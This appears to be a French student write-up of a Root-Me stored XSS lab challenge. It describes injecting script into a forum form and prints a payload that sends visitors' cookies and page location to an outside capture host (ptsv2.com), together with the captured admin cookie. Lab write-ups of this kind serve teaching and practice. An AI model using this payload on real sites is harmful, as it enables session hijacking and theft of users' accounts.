| Élève | Date | Sujet | 
|---|---|---|
| 02/06/2022 | TP-07 / Faille Web Client XSS | 
XSS - Stockée 1
Analyse du site
Le formulaire du forum permet d'injecter du code, notamment du javascript.

Lorsque l'on appui sur send, notre script est bien éxécuté :

Compromission
Java Script + balise  img
Avec l'aide d'un site ou l'on peu poster des données (ex : ptsv2.com), nous somme en mesures de créer un lien vers une fausse image, avec les données du cookies administrateur. En réalité, nous recevrons chaque cookies de chaque personne qui accèdera à cette "image".
Les retours à la ligne de semble pas être pris en compte.
Ci-dessous le code injecté :
<script>document.write('<img SRC = "https://ptsv2.com/t/1xojy-1656579182/post?' +'location='+document.location +'&cookie='+ document.cookie +'">');</script>

Le résultat après queqlues minutes :

Nous avons le cookie admin !!
Parameter Values cookie ADMIN_COOKIE=NkI9qe4cdLIO2P7MIsWS8ofD6 location http://challenge01.root-me.org/web-client/ch18/?idx=3
Full JS
Ci-dessous le code injecté :